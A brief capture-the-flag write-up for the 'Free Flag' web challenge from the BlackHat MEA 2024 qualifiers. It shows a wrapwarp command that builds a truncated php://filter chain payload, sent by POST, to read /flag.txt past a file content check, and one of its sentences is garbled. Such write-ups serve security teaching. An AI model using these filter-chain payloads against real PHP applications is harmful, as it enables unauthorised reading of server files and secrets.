Rating: 5.0

# Free Flag Writeup

- **Category:** Web
- **Points:** 110
- **Difficulty:** Easy

## Challenge Description

Free Free

## Challenge Files

[here](https://github.com/hanzalaghayasabbasi/BlackHat-MEA-2024-Qualifiers-Write-Ups/tree/main/FreeFlag-src).

### Exploiting

To bypass the file content check, a malicious payload can be crafted using the `wrapwarp` tool. The following command generates the payload:

```bash
python3 wrapwarp.py /flag.txt "" 100

Generated Payload:

php://filter/convert.base64-encode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-……………………….........
```
### Get Flag
Once the payload is generated, it is transmitted via a POST request. This payload enables the retrieval of the flag by embedding it between , thereby circumventing the file content check.

![image](https://github.com/user-attachments/assets/68a070bf-cf4d-46e7-825c-ed04690981e8)

Original writeup (https://github.com/hanzalaghayasabbasi/BlackHat-MEA-2024-Qualifiers-Write-Ups/blob/main/Free%20Flag.md).